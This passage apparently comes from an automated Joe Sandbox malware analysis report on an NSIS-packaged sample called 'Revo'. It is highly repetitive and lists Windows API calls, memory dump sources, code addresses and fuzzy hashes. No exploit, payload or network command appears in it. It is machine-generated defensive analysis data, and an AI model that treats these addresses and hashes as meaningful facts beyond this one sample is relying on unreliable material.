                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                              • String ID: %s%S.dll$UXTHEME
                                                                                                                                              • API String ID: 2200240437-1106614640
                                                                                                                                              • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                              • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                                                                                                              • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                              • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                                                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                                                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                              • Opcode ID: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
                                                                                                                                              • Instruction ID: 8b1e6a7b1bb1698afdfead794f6417fbb3764ba01e46f9acc2dad3d3b5bdcb0f
                                                                                                                                              • Opcode Fuzzy Hash: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
                                                                                                                                              • Instruction Fuzzy Hash: 26213B72D04119AFCB05DF98DE85AEEBBB5EB08300F14003AF945F62A0D7749D81DB98
                                                                                                                                              APIs
                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                              • String ID: !
                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                              • Opcode ID: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
                                                                                                                                              • Instruction ID: 9c099894a08b5387b140c0c6ceeae01ce9e162d44e3ef65fd99a7f94bc085c8a
                                                                                                                                              • Opcode Fuzzy Hash: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
                                                                                                                                              • Instruction Fuzzy Hash: 00219E71D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B889418B98
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402128
                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00002000,?,0041E658,0040A000,?,00000008,00000001,000000F0), ref: 00402189
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Librarylstrlen$CallbackDispatcherFreeHandleLoadModuleTextUserWindowlstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 719239633-0
                                                                                                                                              • Opcode ID: 5de1fd10f3c34d91682e05c9c3a69af0ea4da51c711688d66b0c73311e70599a
                                                                                                                                              • Instruction ID: ce338c56279ea8fe8b79aec8352296299df23ba62fb37657eb23f857ac8d175a
                                                                                                                                              • Opcode Fuzzy Hash: 5de1fd10f3c34d91682e05c9c3a69af0ea4da51c711688d66b0c73311e70599a
                                                                                                                                              • Instruction Fuzzy Hash: 9721D431900104EADF10AFA5CF89A9E7A71BF54355F30413BF501B91E5CBBD89829A2E
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 0040602A
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                              • lstrlenW.KERNEL32(00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 004060D2
                                                                                                                                              • GetFileAttributesW.KERNEL32(00456750,00456750,00456750,00456750,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 004060E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                              • String ID: PgE
                                                                                                                                              • API String ID: 3248276644-3220684765
                                                                                                                                              • Opcode ID: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
                                                                                                                                              • Instruction ID: 4bebfd15c2bd202af51862231bcf25e973859f7a9abf5f27d8efd0e3f4a0fce5
                                                                                                                                              • Opcode Fuzzy Hash: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
                                                                                                                                              • Instruction Fuzzy Hash: 21F07835084A6259E622B7360C05AAF25098F8232470B423FFC43B22C1DF3D8973D17E
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,00004000,00000000,?,?,?,?,Remove folder: ,?,00000000,004067E1,80000002), ref: 004065B6
                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 004065C1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID: Remove folder:
                                                                                                                                              • API String ID: 3356406503-1958208860
                                                                                                                                              • Opcode ID: 550d5fe316565dec20d5196d1d20fe7c807bd52d6266540c79109f3c5ea7b4a7
                                                                                                                                              • Instruction ID: 7e3264d492d8171c025e68cf2784a3a6e2d975f6d7be64ef5dd4a0d5c385ab57
                                                                                                                                              • Opcode Fuzzy Hash: 550d5fe316565dec20d5196d1d20fe7c807bd52d6266540c79109f3c5ea7b4a7
                                                                                                                                              • Instruction Fuzzy Hash: E1017C72500209BBDF218F55DC09EDB3BA8EF54364F01403AFE16A2190E378DA64DBA4
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 004061DF
                                                                                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403663,004CD000,004D1000,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F), ref: 004061FA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                              • String ID: nsa
                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                              • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                              • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                                                                                                              • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                              • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                              • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                                                                                                              • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                              • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                              • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                                                                                                              • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                              • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                                                                                                              • Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
                                                                                                                                              • Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                                                                                                              • Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                                                                                                              • Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
                                                                                                                                              • Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                                                                                                              • Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                                                                                                              • Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
                                                                                                                                              • Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                                                                                                              • Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                                                                                                              • Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
                                                                                                                                              • Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                                                                                                              • Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
